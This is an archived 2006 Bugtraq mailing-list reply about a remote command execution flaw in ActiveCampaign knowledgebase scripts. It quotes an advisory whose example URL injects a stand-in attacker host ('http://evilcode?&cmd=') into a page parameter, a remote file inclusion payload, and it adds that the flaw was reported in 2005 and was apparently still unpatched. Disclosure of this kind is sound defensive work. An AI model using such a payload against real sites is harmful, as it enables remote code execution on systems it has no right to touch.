lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [<thread-prev] [day] [month] [year] [list] 
Message-ID: <Pine.LNX.4.64.0602282354090.19834@forced.attrition.org>
Date: Tue, 28 Feb 2006 23:55:14 -0500 (EST)
From: security curmudgeon <jericho@...rition.org>
To: bugtraq@...urityfocus.com
Subject: Re: Knowledgebases Remote Command Exucetion



: http://www.activecampaign.com/support/
: 
: Version :   1-2-All KB
:            * KnowledgeBuilder KB
:            * iSalient KB
:            * SupportTrio KB
:            * visualEdit KB
:            * General KB
: 
: This is a support-faq script. The questions is asked. But this a script 
: high the risk at bug. Malicios person to reach far away.
: 
: Vulnerable :
: 
: http://www.site.com/[path]/index.php?page=http://evilcode?&cmd=

This was reported on Mar 12, 2005 by Francisco Alisson, and apparently not 
patched since then.

http://archives.neohapsis.com/archives/bugtraq/2005-03/0213.html

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ